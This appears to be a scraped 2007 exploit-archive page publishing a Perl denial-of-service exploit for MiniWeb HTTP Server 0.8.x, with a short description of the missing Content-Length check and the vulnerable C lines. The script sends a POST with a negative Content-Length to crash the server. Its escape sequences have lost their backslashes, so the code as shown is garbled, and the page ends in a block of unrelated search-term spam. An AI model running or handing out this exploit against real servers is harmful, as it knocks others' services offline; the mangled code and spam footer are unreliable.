about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MiniWeb Http Server 0.8.x Remote Denial of Service Exploit




2007-06-09 MiniWeb Http Server 0.8.x Remote Denial of Service Exploit
Rated as : High Risk

# MiniWeb Http Server 0.8.x Remote Denial of Service
# MiniWeb site http://sourceforge.net/projects/miniweb/
# Author: gbr
#
# Tested running the server under Windows XP SP2
#
# Description:
#
# The server doesn't do a sanity-check on 'Content-Length' value from POST
Header, allowing the attacker to control
# the allocation size and the position in the 'pucPayload' char pointer to
write.
# This could be used to trigger an exception.
#
#
# Vulnerable code - file http.c | lines 701-702 MiniWeb 0.8.1 | lines 704
- 705 MiniWeb 0.8.19
# ------------------------------------------
#
phsSocket->request.pucPayload=malloc(phsSocket->response.iContentLength+1);
#
phsSocket->request.pucPayload[phsSocket->response.iContentLength]=0;
# ------------------------------------------

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

my $host = shift || die "usage: perl $0 host [port]n";
my $port = shift || 80;

my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort =>
$port, PeerProto => 'tcp')
or die "error: $!n";

$sock->send("POST / HTTP/1.1rn");
$sock->send("Content-Length: -10rnrn");

$sock->close;

print "Exploitedn";
securitydot.net - 2007-06-09

Advertising

Copyright 2007, SecurityDot
Sun, 22 Nov 2009 12:01:12 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
shop571012 200 /compo kinxxx sql in php FREESEXVED Phoniatric real orgas Ayuashari lo291l php-nuke 2 r60 mambo Remo www.80845. indiansexi Trt qudouyin.y WWWSEX89 www.chinac mod_reweri sania sexy tieba.baid xxx.pics ladies boo alenka2.04 search/exp trendmicro qcms local squi m...n.com/ agemaching /search/ex 22534.html Nayanthara xxm.u69.cn vbulletin tb source ti ft brit www.xmchua SSH-1.99-O download a news for c Japanese L www.nansia Wap indian old men ga px.rrgv.ne news for c movie sexs news for c ti ft brit